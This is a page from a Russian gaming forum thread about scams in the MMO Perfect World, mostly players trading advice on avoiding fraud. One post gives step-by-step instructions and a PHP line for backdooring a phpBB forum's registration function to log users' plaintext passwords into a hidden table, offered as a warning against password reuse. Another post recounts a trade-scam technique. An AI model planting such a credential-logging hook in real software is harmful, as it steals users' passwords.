Закрытая тема
Страница 4 из 529 ПерваяПервая ... 2 3 4 5 6 14 54 104 504 ... ПоследняяПоследняя
Показано с 31 по 40 из 5288
  1. #31
    Развивающийся Jlucc житель Идеального Мира Аватар для Jlucc
    Регистрация
    07.07.2008
    Сообщений
    29

    По умолчанию

    Всё кидалово основанно на невнимательности, внимательных не - кинут, невнимательных - кинут, но в дальнейшем они начнут смотреть что и зачем делают... ну а тех кто не думает и не хочет, тех будут кидать каждый раз...

    А поповоду убить железо программой... чисто гипотетически, можно написать программулину которая отключит охлаждение?

  2. #32
    У наставника crew3333 житель Идеального Мира
    Регистрация
    30.06.2008
    Сообщений
    1

    По умолчанию

    много писали, но не увидел самого главного фактора, помогающему действовать кидалам - элементарная человеческая жадность. Именно побуждаемый жадностью человек ведется на развод и кидают исключительно людей которые ведутся на халяву и т.п.

  3. #33
    Развивающийся Rioman житель Идеального Мира Аватар для Rioman
    Регистрация
    30.06.2008
    Сообщений
    26

    Post

    Много писали про то,что если на "нехороших" сайтах зарегистрироватся под своим логином,то вскроют акк,это не верно,но вот,если пароль совпадет,то очень может быть,а про то,что на укозе админ не может смотреть регистрацию - это истинна.но если админу надо,то регистрация будет идти не на укоз.а сразу ему на мыло поверьте это не так сложно делать.
    Вывод - пароль для входу в игру не дублировать нигде,знать его должны только вы,в остальном хакнуть очень сложно.

    Но как сказал один очень серьезный человек:"Любая защита для опытного человека - это только вопрос времени,если вас решили хакнуть,то вас хакнут"

    P.S.Цитатку немного изменил,в оригинале было обворовать,но и тут подходит в принципе.

  4. #34
    Любопытный HeroMafia житель Идеального Мира Аватар для HeroMafia
    Регистрация
    15.07.2008
    Сообщений
    12

    По умолчанию

    Кхм...честно признаюсь кидал когдато людей в л2....каюсь!! Само легко человека развести это внушить ему(не прямой речью понятно) что вы сам нуб. К примеру я хотел получить там Б дагер (среднее оружее более-менее) и предлагал за это А Меч (уже получе) Человек понятно в восторге что он нашел такого лоха и что ему за его мусор предлагают дело и готов идти на все....а дальше уже дело техники.
    -Если чрезмерная увлеченность вашего ребенка компьютерными играми вас беспокоит,то приучите его к более полезным вещам: Алкоголю,Наркотикам,Табаку,Женщинам
    -Богатство или ум?-спросили у него. Он как умный человек выбрал богатство.

  5. #35
    Неопределившийся 001002 житель Идеального Мира Аватар для 001002
    Регистрация
    08.07.2008
    Адрес
    Russia, Moscow.
    Сообщений
    195

    По умолчанию

    Кстати наглядный пример, как угнать пароль на форуме клана "МегаСуперКлан.ru".

    Для примера используется хостинг с поддержкой php, mysql и бесплатный форум phpbb (уже мало чем уступает форумам vBulletin).

    Для начала в базе данных создаем таблицу (например h_userpass) с тремя полями (id, login,password).

    В phpmyadmin:

    1) id - тип:int, длина значения:у нас будет 3, дополнительно:auto_increment, и делаем её первичной.
    2,3) login,password - тип можно поставить text

    Жмакаем "Сохранить".

    Теперь в /includes/functions_user.php в функцию user_add (в phpbb3.0.2 строка 152) добавляем вот такую запись:

    PHP код:
    $h_userpass mysql_query("INSERT INTO h_userpass (id,login,password) VALUES (NULL, '$_POST[username]', '$_POST[new_password]')"); 
    И как ни странно это ВСЕ!

    Как удобно для себя вывести инфу из БД писать не буду, тут все просто да и не по теме.

    P.S. Данный пример был написан для того, что бы понять (тем, кто не знает) как легко регистрируясь на форуме какого либо клана с использованием игровых логина и пароля можно легко потерять своего персонажа и все его ценности.

    Будте внимательны!

    Немного скринов:
    1) functions_user
    2) БД структура
    3) БД результат

  6. #36

    По умолчанию

    в бытность мою ГМом в некоей ммо, доступ к логам был только у админов, которым в основном некогда заниматься такими вещами. Но впринципе это зависит от кол-ва человек в администрации.

    з.ы. Что то подсказывает мне, люди которых кидают в игре форум не читают... )
    Серьёзное лицо-это ещё не признак ума.
    Как известно все величайшие глупости в мире
    Совершались с серьёзным выражением лица.
    Улыбайтесь господа, улыбайтесь!

  7. #37
    Любопытный HeroMafia житель Идеального Мира Аватар для HeroMafia
    Регистрация
    15.07.2008
    Сообщений
    12

    По умолчанию

    я вот еще тут нубец я воть не знаю можно ли тут выкидывать на землю предметы и можно ли тут делать масс телепорт если можно тогда нада предостеречь от еще 1 вида кидания..
    -Если чрезмерная увлеченность вашего ребенка компьютерными играми вас беспокоит,то приучите его к более полезным вещам: Алкоголю,Наркотикам,Табаку,Женщинам
    -Богатство или ум?-спросили у него. Он как умный человек выбрал богатство.

  8. #38
    Параноик
    ex-Moderator
    Rinoa1337 на пути к Городу Драконов Аватар для Rinoa1337
    Регистрация
    06.07.2008
    Сообщений
    1,067

    По умолчанию

    можно
    нельзя

  9. #39
    На перепутье FLUherrAD житель Идеального Мира Аватар для FLUherrAD
    Регистрация
    05.06.2008
    Адрес
    Москва
    Сообщений
    152

    По умолчанию

    Чтобы доказать виновность когото,скринов недостаточно.Надо вводить заверения сделок администрацией,только в таких сделках,вор будит являться вором.А если вас развели и у вас есть скрины,это не доказательства...может вы специально все так подстроили...Это все как у страховщиков)
    ...Теперь можно было считать,что ежели человека не кормить,не поить и не лечить,то он,эта,будет,значить,несчастлив и даже,может,помрет...

  10. #40
    На перепутье VeseliyRoger приспешник Бездушных Аватар для VeseliyRoger
    Регистрация
    29.06.2008
    Сообщений
    135

    По умолчанию

    Цитата Сообщение от HeroMafia Посмотреть сообщение
    я вот еще тут нубец я воть не знаю можно ли тут выкидывать на землю предметы
    Предметы лучше передавать через Сделку.

    Далее. Не знаю, писали это или нет, но способ уничтожать кидал есть. Если уверен, что какой - нибудь господин N - кидала, нужно написать об этом на весь мир. Это предостережёт остальных. Но, пока я таких сообщений не видел.
    Dura lex, sed lex...

Закрытая тема
Страница 4 из 529 ПерваяПервая ... 2 3 4 5 6 14 54 104 504 ... ПоследняяПоследняя

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения